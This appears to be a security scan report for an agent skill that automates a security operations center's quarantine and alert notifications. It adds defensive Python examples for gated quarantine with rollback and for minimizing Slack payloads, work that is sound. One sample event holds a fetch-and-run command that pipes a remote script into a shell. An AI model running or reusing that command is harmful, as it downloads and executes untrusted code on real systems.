Pilot Security Operations Center Setup

Security checks across malware telemetry and agentic risk

Overview

This skill documents its SOC setup recipe, but review its automatic blocking, quarantine, trust, and external notification behavior before putting it into production.

Install it only in an environment where you accept agent handshakes, event sharing on the Pilot network, and possible automated blocklist or quarantine actions. Review each dependent pilot-* skill, test in monitor-only mode or on a lab network first, define rollback/unquarantine procedures before enabling enforcement, and limit Slack or webhook payloads to approved, non-sensitive fields.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
  • Supply Chain: Unpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
Findings (2)

Missing User Warnings

Severity: Medium
Confidence: 89%

Finding
The README promotes automatic blocking and quarantining of nodes but does not warn that these actions can disrupt legitimate traffic, isolate healthy systems, or cause self-inflicted denial of service if detections are wrong. In a SOC automation skill, that omission is security-relevant because operators may enable aggressive enforcement without understanding operational blast radius or rollback requirements.
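As an added example (not code from the Pilot SOC skill or the Pilot project), this is the kind of gate an operator would put in front of automatic quarantine to address the finding above and the Overview's advice to start monitor-only and define rollback: a monitor mode that records decisions without acting, a confidence floor, a protected-node list, a cap on how many nodes may be isolated at once, and a ledger that lets the operator undo every action one bad rule caused. The quarantine and release callbacks, the detection fields and the sample detections are assumptions; the page does not show the Pilot network's quarantine API.

```python
"""Enforcement gate for automated block/quarantine actions.

Added example, not code from the Pilot SOC skill. The page does not show
the Pilot network's quarantine API, so the actual quarantine and release
calls are injected as callbacks (an assumed interface).
"""
from dataclasses import dataclass
from typing import Callable, Dict, List, Sequence, Tuple


@dataclass
class Detection:
    node: str          # hostname or IP the detection points at
    rule: str          # detection rule that fired
    confidence: float  # detector confidence, 0.0 .. 1.0


@dataclass
class Decision:
    node: str
    action: str        # "would-quarantine", "quarantined", "skip" or "released"
    reason: str


class QuarantineGate:
    """Decides whether a detection may trigger an automatic quarantine.

    mode="monitor": records what would happen and touches nothing.
    mode="enforce": calls quarantine(node), subject to the same limits.
    """

    def __init__(self, quarantine: Callable[[str], None],
                 release: Callable[[str], None], mode: str = "monitor",
                 min_confidence: float = 0.9, max_active: int = 3,
                 protected: Sequence[str] = ()):
        if mode not in ("monitor", "enforce"):
            raise ValueError("mode must be 'monitor' or 'enforce'")
        self.mode = mode
        self.min_confidence = min_confidence
        self.max_active = max_active        # blast-radius cap
        self.protected = set(protected)     # nodes never auto-quarantined
        self._quarantine = quarantine
        self._release = release
        self.active: Dict[str, Detection] = {}  # node -> cause, for rollback
        self.log: List[Decision] = []

    def handle(self, det: Detection) -> Decision:
        if det.node in self.protected:
            d = Decision(det.node, "skip", "protected node")
        elif det.confidence < self.min_confidence:
            d = Decision(det.node, "skip", f"confidence {det.confidence:.2f} below floor")
        elif det.node in self.active:
            d = Decision(det.node, "skip", "already quarantined")
        elif len(self.active) >= self.max_active:
            # Refuse rather than isolate a large part of the fleet on one bad rule.
            d = Decision(det.node, "skip", "quarantine cap reached, escalate to operator")
        else:
            if self.mode == "enforce":
                self._quarantine(det.node)
            # Tracked in both modes so monitor mode is a faithful dry run of the cap.
            self.active[det.node] = det
            action = "quarantined" if self.mode == "enforce" else "would-quarantine"
            d = Decision(det.node, action, det.rule)
        self.log.append(d)
        return d

    def rollback(self, node: str) -> bool:
        """Release one node this gate quarantined; False if it was not ours."""
        if node not in self.active:
            return False
        if self.mode == "enforce":
            self._release(node)
        del self.active[node]
        self.log.append(Decision(node, "released", "operator rollback"))
        return True

    def rollback_rule(self, rule: str) -> List[str]:
        """Undo every quarantine caused by one rule, e.g. after a false-positive signature."""
        return [n for n, det in list(self.active.items())
                if det.rule == rule and self.rollback(n)]


# Constructed sample detections, not real telemetry.
SAMPLE = [
    Detection("web-01", "c2-beacon", 0.97),
    Detection("soc-collector", "c2-beacon", 0.99),  # protected
    Detection("web-02", "c2-beacon", 0.55),         # below confidence floor
    Detection("db-01", "c2-beacon", 0.96),
    Detection("db-02", "c2-beacon", 0.95),
    Detection("db-03", "c2-beacon", 0.98),          # over the cap of 3
]


def run(mode: str) -> Tuple[QuarantineGate, List[str]]:
    """Drive the gate over SAMPLE; returns the gate and the enforcement calls made."""
    calls: List[str] = []
    gate = QuarantineGate(quarantine=lambda n: calls.append("q:" + n),
                          release=lambda n: calls.append("r:" + n),
                          mode=mode, protected=["soc-collector"])
    for det in SAMPLE:
        gate.handle(det)
    return gate, calls


if __name__ == "__main__":
    gate, calls = run("monitor")
    for d in gate.log:
        print(d.action, d.node, d.reason)
    print("enforcement calls:", calls)
```

Run it in monitor mode against a replay of real detections for a while and read the "would-quarantine" decisions before switching to enforce; the cap and the protected list are the two knobs that bound the damage a wrong rule can do, and rollback_rule is the unquarantine procedure the Overview asks you to define.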

Missing User Warnings

Severity: Medium
Confidence: 86%

Finding
The skill describes sending incident data via webhooks and Slack without warning that security events, hostnames, IPs, usernames, and incident metadata may leave the controlled environment and be exposed to third-party services. In a SOC context, this increases the chance of privacy leaks, compliance issues, and unintended disclosure of sensitive security telemetry.
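As an added example (not the skill's own code), one way to keep Slack or webhook payloads to approved, non-sensitive fields as the Overview recommends: an explicit allowlist of fields that may leave the environment, keyed pseudonyms for hostnames and source IPs so the receiver can still correlate repeated alerts about one node without learning its identity, a scrub of IP-looking strings from the free-text fields that do go out, and a check that the destination is an approved HTTPS host. The field names, the sample event, the pseudonym scheme and the approved host list are assumptions for illustration.

```python
"""Outbound notification minimizer for Slack/webhook alerts.

Added example, not code from the Pilot SOC skill. Field names in the
sample event, the allowlists and the pseudonym scheme are assumptions.
"""
import hashlib
import hmac
import json
import re
from typing import Any, Dict
from urllib.parse import urlparse

# Fields an operator has approved for leaving the environment as-is.
APPROVED_FIELDS = {"incident_id", "rule", "severity", "detected_at", "action_taken"}

# Fields that may go out only as a keyed pseudonym: the receiver can tell
# that two alerts concern the same node but cannot recover the name or IP.
PSEUDONYMIZED_FIELDS = {"hostname", "src_ip"}

# Destinations approved for incident notifications (assumed list).
APPROVED_WEBHOOK_HOSTS = {"hooks.slack.com"}

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def pseudonym(value: str, key: bytes) -> str:
    """Short HMAC-SHA256 tag; stable per key, not reversible by the receiver."""
    return hmac.new(key, value.encode(), hashlib.sha256).hexdigest()[:12]


def minimize(event: Dict[str, Any], key: bytes) -> Dict[str, Any]:
    """Fail closed: anything not explicitly approved or pseudonymized is dropped."""
    out: Dict[str, Any] = {}
    for name, value in event.items():
        if name in APPROVED_FIELDS:
            out[name] = value
        elif name in PSEUDONYMIZED_FIELDS:
            out[name] = pseudonym(str(value), key)
        # usernames, command lines, raw samples and unknown fields never leave
    # Approved free-text fields can still smuggle addresses, so scrub them.
    for name in list(out):
        if isinstance(out[name], str):
            out[name] = IPV4.sub("[ip]", out[name])
    return out


def check_destination(url: str) -> bool:
    """Only HTTPS to an approved host; blocks typo'd or attacker-supplied hooks."""
    p = urlparse(url)
    return p.scheme == "https" and p.hostname in APPROVED_WEBHOOK_HOSTS


def build_slack_payload(event: Dict[str, Any], key: bytes, webhook_url: str) -> str:
    """JSON body for a Slack incoming webhook built only from minimized fields."""
    if not check_destination(webhook_url):
        raise ValueError("webhook destination not approved: " + webhook_url)
    safe = minimize(event, key)
    text = ", ".join(f"{k}={v}" for k, v in sorted(safe.items()))
    return json.dumps({"text": f"[{safe.get('severity', '?')}] {text}"})


# Constructed sample event, not real telemetry.
SAMPLE_EVENT = {
    "incident_id": "INC-0042",
    "rule": "c2-beacon",
    "severity": "high",
    "detected_at": "2024-05-01T10:15:00Z",
    "action_taken": "quarantined",
    "hostname": "web-01.corp.example",
    "src_ip": "10.20.30.40",
    "user": "jdoe",
    "process_cmdline": "curl http://10.9.8.7/payload.sh | sh",
}

if __name__ == "__main__":
    print(build_slack_payload(SAMPLE_EVENT, b"rotate-me",
                              "https://hooks.slack.com/services/T000/B000/XXXX"))
```

Keep the pseudonym key inside the SOC and rotate it with the webhook secret; the allowlist, not the event producer, decides what leaves the environment, so a new detector adding a field with secrets in it does not silently start forwarding them.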

VirusTotal

66/66 vendors reported this skill as clean.
